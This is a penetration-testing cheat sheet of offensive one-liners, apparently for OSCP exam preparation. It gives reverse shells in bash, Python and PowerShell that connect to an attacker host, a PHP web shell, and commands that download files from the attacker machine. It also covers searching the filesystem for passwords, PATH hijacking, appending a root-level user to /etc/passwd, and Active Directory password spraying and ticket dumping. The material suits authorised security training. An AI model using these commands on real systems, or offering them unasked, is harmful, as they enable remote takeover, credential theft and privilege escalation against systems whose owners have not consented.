######################################################################
# 15 – USEFUL ONE-LINERS (OSCP SPEED TRICKS)
######################################################################

===========================================================
# 1. Reverse Shells
===========================================================

-------------------------------
# Bash
-------------------------------
bash -i >& /dev/tcp/$localip/4444 0>&1

-------------------------------
# Python
-------------------------------
python3 -c 'import socket,os,subprocess;s=socket.socket();s.connect(("$localip",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(["/bin/bash"])'

-------------------------------
# PHP
-------------------------------
<?php system($_GET['cmd']); ?>

-------------------------------
# PowerShell
-------------------------------
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('$localip',4444);$stream=$client.GetStream();..."

===========================================================
# 2. Download Files
===========================================================

-------------------------------
# Linux → from your machine
-------------------------------
wget http://$localip/file -O file  
curl http://$localip/file -o file  

-------------------------------
# Windows
-------------------------------
certutil -urlcache -split -f http://$localip/file.exe file.exe

===========================================================
# 3. Enumeration
===========================================================

-------------------------------
# Find interesting files
-------------------------------
grep -R "password" / 2>/dev/null  
grep -R "pass" /etc 2>/dev/null  

-------------------------------
# Find SUID binaries
-------------------------------
find / -perm -4000 2>/dev/null

-------------------------------
# Find world-writable folders
-------------------------------
find / -writable -type d 2>/dev/null

===========================================================
# 4. PrivEsc Helpers
===========================================================

-------------------------------
# PATH hijacking
-------------------------------
echo "/bin/bash" > /tmp/ping; chmod +x /tmp/ping; export PATH=/tmp:$PATH

-------------------------------
# Add root user (writable passwd)
-------------------------------
echo "root2:$(openssl passwd -1 pass):0:0:root:/root:/bin/bash" >> /etc/passwd

===========================================================
# 5. AD Pentest
===========================================================

-------------------------------
# Validate creds fast
-------------------------------
crackmapexec smb $targetip -u $user -p "$password"

-------------------------------
# Spray passwords
-------------------------------
kerbrute passwordspray -d $domain --dc $targetip users.txt 'Password1!'

-------------------------------
# Dump tickets
-------------------------------
Rubeus dump /nowrap

######################################################################
# END OF 15_USEFUL_ONE_LINERS.TXT
######################################################################
